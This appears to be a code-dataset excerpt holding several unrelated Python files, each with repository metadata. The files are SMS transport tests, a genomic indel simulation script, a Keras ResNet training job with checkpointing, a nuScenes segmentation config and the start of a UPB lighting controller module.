{'missing_parameter': ['SOURCEADDR']})
@inlineCallbacks
def test_ignored_parameters(self):
url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
serviceID='d', SERVICEID='e', unsub='f')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
class TestAcksCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
self._mock_response = ''
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
'validation_mode': 'permissive',
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def mock_response(self, response):
self._mock_response = response
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return self._mock_response
@inlineCallbacks
def mock_event(self, msg, nr_events):
self.mock_response(msg)
yield self.tx_helper.make_dispatch_outbound(
"foo", to_addr='2371234567', message_id='id_%s' % (msg,))
yield self.cellulant_sms_calls.get()
events = yield self.tx_helper.wait_for_dispatched_events(nr_events)
returnValue(events)
@inlineCallbacks
def test_nack_param_error_E0(self):
[nack] = yield self.mock_event('E0', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E0')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E0'])
@inlineCallbacks
def test_nack_login_error_E1(self):
[nack] = yield self.mock_event('E1', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E1')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E1'])
@inlineCallbacks
def test_nack_credits_error_E2(self):
[nack] = yield self.mock_event('E2', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E2')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E2'])
@inlineCallbacks
def test_nack_delivery_failed_1005(self):
[nack] = yield self.mock_event('1005', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_1005')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['1005'])
@inlineCallbacks
def test_unknown_response(self):
[nack] = yield self.mock_event('something_unexpected', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_something_unexpected')
self.assertEqual(nack['nack_reason'],
'Unknown response code: something_unexpected')
@inlineCallbacks
def test_ack_success(self):
[event] = yield self.mock_event('1', 1)
self.assertEqual(event['event_type'], 'ack')
self.assertEqual(event['user_message_id'], 'id_1')
class TestPermissiveCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
'validation_mode': 'permissive',
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return ''
def mkurl(self, content, from_addr="2371234567", **kw):
params = {
'SOURCEADDR': from_addr,
'DESTADDR': '12345',
'MESSAGE': content,
'ID': '1234567',
}
params.update(kw)
return self.mkurl_raw(**params)
def mkurl_raw(self, **params):
return '%s%s?%s' % (
self.transport_url,
self.config['web_path'],
urlencode(params)
)
@inlineCallbacks
def test_bad_parameter_in_permissive_mode(self):
url = self.mkurl('hello', foo='bar')
response = yield http_request_full(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(200, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_missing_parameters(self):
url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'missing_parameter': ['SOURCEADDR']})
@inlineCallbacks
def test_ignored_parameters(self):
url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
serviceID='d', SERVICEID='e', unsub='f')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
| true | true |
1c3330f58e7b519be076c0bf3286fea33c99ab94 | 2,907 | py | Python | scripts/helperSimulations.py | alok123t/HyINDEL | 39cb5a32f08c9c3054f9b7237cb39baab7172d82 | [
"MIT"
] | 4 | 2020-07-11T09:49:09.000Z | 2021-10-14T18:54:53.000Z | scripts/helperSimulations.py | alok123t/HyINDEL | 39cb5a32f08c9c3054f9b7237cb39baab7172d82 | [
"MIT"
] | 1 | 2021-10-10T14:21:06.000Z | 2021-11-06T13:01:18.000Z | scripts/helperSimulations.py | alok123t/HyINDEL | 39cb5a32f08c9c3054f9b7237cb39baab7172d82 | [
"MIT"
] | null | null | null | import random
import sys
# Small, large size ranges
DISTR = [[50, 500], [500, 10000]]
# Number of variants for each size range
N_DISTR = 375
def getRandomString(l):
return ''.join(random.choice('ATGC') for _ in range(l))
def genPositions():
# For each size range
for d in DISTR:
# Insertions
rndVals = random.sample(range(d[0], d[1]), N_DISTR)
for val in rndVals:
out = 'INC ' + getRandomString(val)
print(out)
# Deletions
rndVals = random.sample(range(d[0], d[1]), N_DISTR)
for val in rndVals:
out = 'DEL ' + str(val)
print(out)
def genVariants(folderPath):
dels_large = []
dels_small = []
ins_large = []
ins_small = []
# Read input bedpe file
with open(folderPath + 'tmp.bedpe', 'r') as f:
for line in f:
l = line.split('\t')
if 'DEL' in l[6]:
chr = l[0]
st = int(l[2])
en = int(l[4])
if en - st + 1 < 500:
dels_small.append([chr, st, en])
else:
dels_large.append([chr, st, en])
elif 'LITERAL' in l[0]:
chr = l[3]
pos = int(l[4])
sz = int(l[1])
seq = getRandomString(sz)
if sz < 500:
ins_small.append([chr, pos, seq])
else:
ins_large.append([chr, pos, seq])
# Write variants
with open(folderPath + '1.txt', 'w') as f1, open(folderPath + '2.txt', 'w') as f2:
# Dels large
for i in range(len(dels_large)):
x = dels_large[i]
out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
if i < len(dels_large) / 2:
f1.write(out)
f2.write(out)
# Dels small
for i in range(len(dels_small)):
x = dels_small[i]
out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
if i < len(dels_small) / 2:
f1.write(out)
f2.write(out)
# Ins large
for i in range(len(ins_large)):
x = ins_large[i]
out = 'INCL ' + x[0] + ' ' + \
str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
if i < len(ins_large) / 2:
f1.write(out)
f2.write(out)
# Ins small
for i in range(len(ins_small)):
x = ins_small[i]
out = 'INCL ' + x[0] + ' ' + \
str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
if i < len(ins_small) / 2:
f1.write(out)
f2.write(out)
def main():
if sys.argv[1] == 'genPositions':
genPositions()
elif sys.argv[1] == 'genVariants':
genVariants(sys.argv[2])
if __name__ == '__main__':
main()
| 28.782178 | 86 | 0.43894 | import random
import sys
DISTR = [[50, 500], [500, 10000]]
N_DISTR = 375
def getRandomString(l):
return ''.join(random.choice('ATGC') for _ in range(l))
def genPositions():
for d in DISTR:
rndVals = random.sample(range(d[0], d[1]), N_DISTR)
for val in rndVals:
out = 'INC ' + getRandomString(val)
print(out)
rndVals = random.sample(range(d[0], d[1]), N_DISTR)
for val in rndVals:
out = 'DEL ' + str(val)
print(out)
def genVariants(folderPath):
dels_large = []
dels_small = []
ins_large = []
ins_small = []
with open(folderPath + 'tmp.bedpe', 'r') as f:
for line in f:
l = line.split('\t')
if 'DEL' in l[6]:
chr = l[0]
st = int(l[2])
en = int(l[4])
if en - st + 1 < 500:
dels_small.append([chr, st, en])
else:
dels_large.append([chr, st, en])
elif 'LITERAL' in l[0]:
chr = l[3]
pos = int(l[4])
sz = int(l[1])
seq = getRandomString(sz)
if sz < 500:
ins_small.append([chr, pos, seq])
else:
ins_large.append([chr, pos, seq])
with open(folderPath + '1.txt', 'w') as f1, open(folderPath + '2.txt', 'w') as f2:
for i in range(len(dels_large)):
x = dels_large[i]
out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
if i < len(dels_large) / 2:
f1.write(out)
f2.write(out)
for i in range(len(dels_small)):
x = dels_small[i]
out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
if i < len(dels_small) / 2:
f1.write(out)
f2.write(out)
for i in range(len(ins_large)):
x = ins_large[i]
out = 'INCL ' + x[0] + ' ' + \
str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
if i < len(ins_large) / 2:
f1.write(out)
f2.write(out)
for i in range(len(ins_small)):
x = ins_small[i]
out = 'INCL ' + x[0] + ' ' + \
str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
if i < len(ins_small) / 2:
f1.write(out)
f2.write(out)
def main():
if sys.argv[1] == 'genPositions':
genPositions()
elif sys.argv[1] == 'genVariants':
genVariants(sys.argv[2])
if __name__ == '__main__':
main()
| true | true |
1c3331f13df114ad08467370a9d4d07f01f65559 | 7,816 | py | Python | examples/pwr_run/checkpointing/final/no_threshold/job53.py | boringlee24/keras_old | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | [
"MIT"
] | null | null | null | examples/pwr_run/checkpointing/final/no_threshold/job53.py | boringlee24/keras_old | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | [
"MIT"
] | null | null | null | examples/pwr_run/checkpointing/final/no_threshold/job53.py | boringlee24/keras_old | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | [
"MIT"
] | null | null | null | """
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.resnet import ResNet50, ResNet101, ResNet152
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 256
args_lr = 0.001
args_model = 'resnet50'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_no_threshold/' + job_name + '*'
total_epochs = 4
starting_epoch = 0
# first step is to update the PID
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
if '50' in args_model:
base_model = ResNet50(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '101' in args_model:
base_model = ResNet101(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '152' in args_model:
base_model = ResNet152(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
#model.add(layers.UpSampling2D((2,2)))
#model.add(layers.UpSampling2D((2,2)))
#model.add(layers.UpSampling2D((2,2)))
model.add(base_model)
model.add(layers.Flatten())
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(128, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(64, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
if epoch_waste_time > 0:
send_signal.send(args.node, 10002, message)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_no_threshold/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
message = job_name + ' checkpoint'
send_signal.send(args.node, 10002, message)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
first_epoch_start = 0
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch, first_epoch_start
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
if epoch == starting_epoch and args.resume:
first_epoch_start = time.time()
message = job_name + ' d_end'
send_signal.send(args.node, 10002, message)
elif epoch == starting_epoch:
first_epoch_start = time.time()
if epoch == starting_epoch:
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
def on_epoch_end(self, epoch, logs=None):
if epoch == starting_epoch:
first_epoch_time = int(time.time() - first_epoch_start)
message = job_name + ' 1st_epoch ' + str(first_epoch_time)
send_signal.send(args.node, 10002, message)
progress = round((epoch+1) / round(total_epochs/2), 2)
message = job_name + ' completion ' + str(progress)
send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 32.978903 | 118 | 0.69153 |
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.resnet import ResNet50, ResNet101, ResNet152
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
batch_size = 256
args_lr = 0.001
args_model = 'resnet50'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_no_threshold/' + job_name + '*'
total_epochs = 4
starting_epoch = 0
pid = os.getpid()
message = job_name + ' pid ' + str(pid)
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
subtract_pixel_mean = True
n = 3
model_type = args.tc
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
if '50' in args_model:
base_model = ResNet50(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '101' in args_model:
base_model = ResNet101(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '152' in args_model:
base_model = ResNet152(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
print(model_type)
current_epoch = 0
| true | true |
1c33327019a9318a80800e8752a3c80c71bc8dcd | 7,953 | py | Python | configs/fusion_consis/xmuda/src_ctr_usa_v1_w2.py | XYHC-MMDA/Multi-modal-Multi-task-DA | ed8297eb489d50c580795713cccb72bc958f406f | [
"Apache-2.0"
] | 1 | 2020-11-05T19:51:23.000Z | 2020-11-05T19:51:23.000Z | configs/fusion_consis/xmuda/src_ctr_usa_v1_w2.py | XYHC-MMDA/Multi-modal-Multi-task-DA | ed8297eb489d50c580795713cccb72bc958f406f | [
"Apache-2.0"
] | null | null | null | configs/fusion_consis/xmuda/src_ctr_usa_v1_w2.py | XYHC-MMDA/Multi-modal-Multi-task-DA | ed8297eb489d50c580795713cccb72bc958f406f | [
"Apache-2.0"
] | null | null | null | # the same as src_ctr_usa_v1.py except for max_pts = 512
##############################################
# variants: Runner, model
# options: class_weights
##############################################
# runner
# runner = 'XmudaRunner' # for any customized runner, use general_train.py
only_contrast = False # default False
# model; if no contrast, just set contrast_criterion to None; assert contrast_criterion is not None or not only_contrast
model_type = 'SegFusionV3'
contrast_criterion = dict(type='NT_Xent', temperature=0.1, normalize=True, contrast_mode='cross_entropy')
max_pts = 512
lambda_contrast = 0.1
img_feat_channels = 64
pts_feat_dim = 16
prelogits_dim = img_feat_channels + pts_feat_dim
# XmudaAug3D, UNetSCn
scn_scale = 20
scn_full_scale = 4096
# class_weights
daynight_weights = [2.68678412, 4.36182969, 5.47896839, 3.89026883, 1.]
usasng_weights = [2.47956584, 4.26788384, 5.71114131, 3.80241668, 1.]
class_weights = usasng_weights
# lr_scheduler
lr_step = [16, 22]
total_epochs = 24
#######################################################
# model
#######################################################
model = dict(
type=model_type,
img_backbone=dict(
type='UNetResNet34',
out_channels=img_feat_channels,
pretrained=True),
pts_backbone=dict(
type='UNetSCN',
in_channels=1,
full_scale=scn_full_scale),
num_classes=5,
prelogits_dim=prelogits_dim,
class_weights=class_weights,
contrast_criterion=contrast_criterion,
max_pts=max_pts,
lambda_contrast=lambda_contrast
)
train_cfg = None
test_cfg = None
class_names = [
'vehicle', # car, truck, bus, trailer, cv
'pedestrian', # pedestrian
'bike', # motorcycle, bicycle
'traffic_boundary' # traffic_cone, barrier
# background
]
data_root = '/home/xyyue/xiangyu/nuscenes_unzip/'
input_modality = dict(
use_lidar=True,
use_camera=True,
use_radar=False,
use_map=False,
use_external=False)
file_client_args = dict(backend='disk')
img_size = (1600, 900)
resize = (400, 225)
train_pipeline = [
dict(
type='LoadPointsFromFileVer2', # new 'points', 'num_seg_pts'
load_dim=5,
use_dim=5),
# dict(
# type='LoadMaskedMultiSweeps', # modify 'points'; new 'num_seg_pts'
# sweeps_num=10,
# file_client_args=file_client_args),
# dict(type='LoadAnnotations3D', with_bbox_3d=True, with_label_3d=True), # new 'gt_bboxes_3d', 'gt_labels_3d'
dict(type='LoadImgSegLabel', resize=resize), # new 'img'(PIL.Image), 'seg_label'
dict(type='PointsSensorFilterVer2', img_size=img_size, resize=resize),
# filter 'points'; new 'pts_indices'; modify 'num_seg_pts', 'seg_label'
dict(type='Aug2D', fliplr=0.5, color_jitter=(0.4, 0.4, 0.4)),
# fliplr & color jitter; 'img': PIL.Image to np.array; update 'seg_pts_indices', 'pts_indices' accordingly;
dict(type='XmudaAug3D', scale=scn_scale, full_scale=scn_full_scale,
noisy_rot=0.1, flip_x=0.5, flip_y=0.5, rot_z=6.2831, transl=True), # new 'scn_coords'
# dict(
# type='GlobalRotScaleTrans',
# rot_range=[-0.7854, 0.7854],
# scale_ratio_range=[0.9, 1.1],
# translation_std=[0.2, 0.2, 0.2]), # 3D Rot, Scale, Trans for 'points'
# dict(
# type='RandomFlip3D',
# # flip_ratio_bev_horizontal=0.5,
# flip_ratio_bev_vertical=0.5), # do nothing; to read further
# dict(type='PointsRangeFilterVer2', point_cloud_range=point_cloud_range),
# # filter 'points', 'pts_indices', 'seg_label'; new 'seg_points', 'seg_pts_indices'
dict(type='GetSegFromPoints'), # new 'seg_points', 'seg_pts_indices'
# dict(type='ObjectRangeFilter', point_cloud_range=point_cloud_range),
# dict(type='DetLabelFilter'), # Filter labels == -1; not in TEN_CLASSES
# dict(type='PointShuffle'), # shuffle 'points', 'pts_indices'; make sure no index op after shuffle
dict(type='MergeCat'), # merge 'seg_label'
dict(type='SegDetFormatBundle'),
dict(type='Collect3D', keys=['img', 'seg_points', 'seg_pts_indices', 'seg_label', 'scn_coords'])
]
test_pipeline = [
dict(
type='LoadPointsFromFileVer2',
load_dim=5,
use_dim=5),
# dict(
# type='LoadMaskedMultiSweeps',
# sweeps_num=10,
# file_client_args=file_client_args),
dict(type='LoadImgSegLabel', resize=resize), # new 'img'(PIL.Image), 'seg_label'
dict(type='PointsSensorFilterVer2', img_size=img_size, resize=resize),
# filter 'points'; new 'pts_indices'; modify 'num_seg_pts', 'seg_label'
dict(type='Aug2D'), # No Aug2D in test; just PIL.Image to np.ndarray
dict(type='XmudaAug3D', scale=scn_scale, full_scale=scn_full_scale), # new 'scn_coords'; no aug3d in test
dict(type='GetSegFromPoints'), # new 'seg_points', 'seg_pts_indices'
dict(type='MergeCat'), # merge 'seg_label'
dict(type='SegDetFormatBundle'),
dict(type='Collect3D', keys=['img', 'seg_points', 'seg_pts_indices', 'seg_label', 'scn_coords'])
# dict(
# type='MultiScaleFlipAug3D',
# img_scale=(1333, 800),
# pts_scale_ratio=1,
# flip=False,
# transforms=[
# # dict(type='PointsRangeFilterVer2', point_cloud_range=point_cloud_range),
# dict(type='MergeCat'),
# dict(type='SegDetFormatBundle'),
# dict(type='Collect3D', keys=['img', 'seg_points', 'seg_pts_indices', 'seg_label'])
# ])
]
# splits
source_train = 'mmda_xmuda_split/train_usa.pkl'
source_test = 'mmda_xmuda_split/test_usa.pkl'
target_train = 'mmda_xmuda_split/train_singapore.pkl'
target_test = 'mmda_xmuda_split/test_singapore.pkl'
target_val = 'mmda_xmuda_split/val_singapore.pkl'
# dataset
dataset_type = 'MMDAMergeCatDataset'
data = dict(
samples_per_gpu=8,
workers_per_gpu=4,
source_train=dict(
type=dataset_type,
data_root=data_root,
ann_file=data_root + source_train,
pipeline=train_pipeline,
classes=class_names,
modality=input_modality,
test_mode=False,
filter_empty_gt=False,
box_type_3d='LiDAR'),
target_train=dict(
type=dataset_type,
data_root=data_root,
ann_file=data_root + target_train,
pipeline=train_pipeline,
classes=class_names,
modality=input_modality,
test_mode=False,
filter_empty_gt=False,
box_type_3d='LiDAR'),
source_test=dict(
type=dataset_type,
data_root=data_root,
ann_file=data_root + source_test,
pipeline=test_pipeline,
classes=class_names,
modality=input_modality,
test_mode=True,
box_type_3d='LiDAR'),
target_test=dict(
type=dataset_type,
data_root=data_root,
ann_file=data_root + target_test,
pipeline=test_pipeline,
classes=class_names,
modality=input_modality,
test_mode=True,
box_type_3d='LiDAR'),
target_val=dict(
type=dataset_type,
data_root=data_root,
ann_file=data_root + target_test,
pipeline=test_pipeline,
classes=class_names,
modality=input_modality,
test_mode=True,
box_type_3d='LiDAR')
)
evaluation = dict(interval=100)
# shedule_2x.py
optimizer = dict(type='AdamW', lr=0.001, weight_decay=0.01)
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=1000,
warmup_ratio=1.0 / 1000,
step=lr_step)
optimizer_config = dict()
# optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
momentum_config = None
# default_runtime.py
checkpoint_config = dict(interval=1)
log_config = dict(
interval=25,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = None
load_from = None
resume_from = None
workflow = [('train', 1)]
| 34.133047 | 120 | 0.655979 | true | true | |
1c33329b62c08f717b74feb9b3ec27e82debf45c | 2,876 | py | Python | Project/src/Modules/House/Family/Upb/upb_device.py | DBrianKimmel/PyHouse | a100fc67761a22ae47ed6f21f3c9464e2de5d54f | [
"MIT"
] | 3 | 2016-11-16T00:37:58.000Z | 2019-11-10T13:10:19.000Z | Project/src/Modules/House/Family/Upb/upb_device.py | DBrianKimmel/PyHouse | a100fc67761a22ae47ed6f21f3c9464e2de5d54f | [
"MIT"
] | null | null | null | Project/src/Modules/House/Family/Upb/upb_device.py | DBrianKimmel/PyHouse | a100fc67761a22ae47ed6f21f3c9464e2de5d54f | [
"MIT"
] | 1 | 2020-07-19T22:06:52.000Z | 2020-07-19T22:06:52.000Z | """
@name: Modules/families/UPB/UPB_device.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2011-2020 by D. Brian Kimmel
@license: MIT License
@note: Created on Mar 27, 2011
@summary: This module is for communicating with UPB controllers.
Load the database with UPB devices.
Start Active UPB Controllers.
If more than one ???
"""
__updated__ = '2020-02-19'
# Import system type stuff
# Import PyMh files
from Modules.Families.UPB.UPB_Pim import Api as upbPimApi
from Modules.Core import logging_pyh as Logger
LOG = Logger.getLogger('PyHouse.UPB_device ')
class lightingUtility(object):
@staticmethod
def _is_upb_active(p_controller_obj):
if p_controller_obj.Family.Name != 'UPB':
return False
# if p_controller_obj.Active:
# return True
class Api(object):
def __init__(self, p_pyhouse_obj):
"""Constructor for the UPB.
"""
self.m_pyhouse_obj = p_pyhouse_obj
def Start(self):
"""For the given house, this will start all the controllers for family = UPB in that house.
"""
l_count = 0
for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
if lightingUtility._is_upb_active(l_controller_obj):
l_controller_prefix = 'house/lighting/controllers/{}'.format(l_controller_obj.Name)
l_controller_obj._HandlerApi = upbPimApi(self.m_pyhouse_obj)
if l_controller_obj._HandlerApi.Start(self.m_pyhouse_obj, l_controller_obj):
LOG.info('Controller {} Started.'.format(l_controller_obj.Name))
l_count += 1
l_topic = 'house/lighting/controllers/' + l_controller_prefix + '/start'
